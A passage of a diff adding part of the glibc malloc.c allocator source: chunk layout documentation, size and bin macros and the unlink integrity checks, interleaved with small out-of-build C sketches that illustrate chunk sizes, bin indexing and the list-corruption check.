+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
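+
+/* A minimal standalone sketch (not part of the upstream malloc.c): the
+   public-API equivalent of the MMAP() wrapper above, i.e. an anonymous,
+   private, read-write mapping obtained straight from the kernel.  The
+   1 MiB size is an arbitrary choice for illustration.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+
+int
+main (void)
+{
+  size_t size = 1 << 20;
+  void *p = mmap (NULL, size, PROT_READ | PROT_WRITE,
+                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  if (p == MAP_FAILED)
+    return 1;
+  /* The kernel hands back zeroed pages -- the cost discussed in the
+     threshold comment further up.  */
+  memset (p, 0x41, size);
+  printf ("mapping at %p\n", p);
+  munmap (p, size);
+  return 0;
+}
+#endif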
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
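+
+/* A minimal standalone sketch (not part of the upstream malloc.c): it
+   peeks at the size field of a live allocation to make the diagram
+   above concrete.  It assumes the glibc layout documented here, with
+   INTERNAL_SIZE_T equal to size_t, so the size field sits one word
+   before the pointer returned to the user.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* Request 24 bytes; on 64-bit glibc this becomes a 0x20-byte chunk.  */
+  char *mem = malloc (24);
+  if (mem == NULL)
+    return 1;
+
+  /* "mem" in the diagram above; the size field is the word before it.  */
+  size_t field = *(size_t *) (mem - sizeof (size_t));
+
+  printf ("chunk size     : %#zx\n", field & ~(size_t) 0x7);
+  printf ("P (PREV_INUSE) : %zu\n", field & 0x1);
+  printf ("M (IS_MMAPPED) : %zu\n", (field >> 1) & 0x1);
+  printf ("A (NON_MAIN)   : %zu\n", (field >> 2) & 0x1);
+
+  free (mem);
+  return 0;
+}
+#endif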
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
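+
+/* A minimal standalone sketch (not part of the upstream malloc.c): it
+   replays the request2size arithmetic above with the common 64-bit
+   constants (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, MINSIZE == 32 -- an
+   assumption of this sketch), so request-to-chunk-size mappings can be
+   checked by hand.  The EX_/ex_ names are local to the example.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+#include <stddef.h>
+
+#define EX_SIZE_SZ            8UL
+#define EX_MALLOC_ALIGN_MASK  15UL
+#define EX_MINSIZE            32UL
+
+static size_t
+ex_request2size (size_t req)
+{
+  if (req + EX_SIZE_SZ + EX_MALLOC_ALIGN_MASK < EX_MINSIZE)
+    return EX_MINSIZE;
+  return (req + EX_SIZE_SZ + EX_MALLOC_ALIGN_MASK) & ~EX_MALLOC_ALIGN_MASK;
+}
+
+int
+main (void)
+{
+  size_t reqs[] = { 0, 8, 24, 25, 56, 1000 };
+  for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
+    printf ("malloc(%4zu) -> chunk of %#zx bytes\n",
+            reqs[i], ex_request2size (reqs[i]));
+  return 0;
+}
+#endif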
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t).
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
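+
+/* A minimal standalone sketch (not part of the upstream malloc.c): a
+   toy model of the fd/bk removal performed by unlink above, reduced to
+   the "corrupted double-linked list" integrity check.  It deliberately
+   omits the size-vs-prev_size check and all nextsize handling; the
+   struct node and toy_unlink names are local to the example.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+#include <stdlib.h>
+
+/* Stand-in for a free chunk's list pointers.  */
+struct node { struct node *fd, *bk; };
+
+static void
+toy_unlink (struct node *p)
+{
+  struct node *fd = p->fd;
+  struct node *bk = p->bk;
+
+  /* Both neighbours must still point back at P, otherwise the list
+     has been tampered with.  */
+  if (fd->bk != p || bk->fd != p)
+    {
+      fprintf (stderr, "corrupted double-linked list\n");
+      abort ();
+    }
+  fd->bk = bk;
+  bk->fd = fd;
+}
+
+int
+main (void)
+{
+  struct node a, b, c;
+
+  /* Circular list a <-> b <-> c <-> a, like chunks in a bin.  */
+  a.fd = &b; b.fd = &c; c.fd = &a;
+  a.bk = &c; c.bk = &b; b.bk = &a;
+
+  toy_unlink (&b);                       /* passes the check */
+  printf ("a.fd == &c after unlink: %d\n", a.fd == &c);
+
+  /* Forging b's links without fixing its neighbours would now make
+     toy_unlink (&b) abort, since a.fd no longer points at b.  */
+  return 0;
+}
+#endif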
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
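+
+/* A minimal standalone sketch (not part of the upstream malloc.c): it
+   replays the smallbin/largebin indexing above for the common 64-bit
+   layout (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, so SMALLBIN_WIDTH == 16,
+   SMALLBIN_CORRECTION == 0 and MIN_LARGE_SIZE == 1024 -- assumptions of
+   this sketch).  The ex_bin_index name is local to the example.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+
+static unsigned
+ex_bin_index (unsigned long sz)
+{
+  if (sz < 1024)                        /* in_smallbin_range */
+    return (unsigned) (sz >> 4);        /* smallbin_index */
+  /* largebin_index_64 */
+  if ((sz >> 6) <= 48)  return 48 + (unsigned) (sz >> 6);
+  if ((sz >> 9) <= 20)  return 91 + (unsigned) (sz >> 9);
+  if ((sz >> 12) <= 10) return 110 + (unsigned) (sz >> 12);
+  if ((sz >> 15) <= 4)  return 119 + (unsigned) (sz >> 15);
+  if ((sz >> 18) <= 2)  return 124 + (unsigned) (sz >> 18);
+  return 126;
+}
+
+int
+main (void)
+{
+  unsigned long sizes[] = { 0x20, 0x90, 0x3f0, 0x400, 0x1000, 0x20000 };
+  for (int i = 0; i < 6; i++)
+    printf ("chunk size %#7lx -> bin %u\n", sizes[i], ex_bin_index (sizes[i]));
+  return 0;
+}
+#endif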
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. Malloc gives them ONE chance
+    to be used before moving them into the regular bins. So, basically,
+    the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even on a 64-bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
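+
+/* A minimal standalone sketch (not part of the upstream malloc.c): it
+   mirrors the binmap bit arithmetic above (32-bit map words, 128 bins)
+   to show which word and bit a given bin index lands in.  The EX_/ex_
+   names are local to the example.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+
+#define EX_BINMAPSHIFT 5
+#define ex_idx2block(i) ((i) >> EX_BINMAPSHIFT)
+#define ex_idx2bit(i)   (1U << ((i) & ((1U << EX_BINMAPSHIFT) - 1)))
+
+int
+main (void)
+{
+  unsigned binmap[4] = { 0 };           /* 128 bins / 32 bits per word */
+  unsigned bins[] = { 1, 37, 100 };
+
+  for (int i = 0; i < 3; i++)
+    {
+      binmap[ex_idx2block (bins[i])] |= ex_idx2bit (bins[i]);  /* mark_bin */
+      printf ("bin %3u -> word %u, bit mask %#010x\n",
+              bins[i], ex_idx2block (bins[i]), ex_idx2bit (bins[i]));
+    }
+  printf ("binmap: %#x %#x %#x %#x\n",
+          binmap[0], binmap[1], binmap[2], binmap[3]);
+  return 0;
+}
+#endif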
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
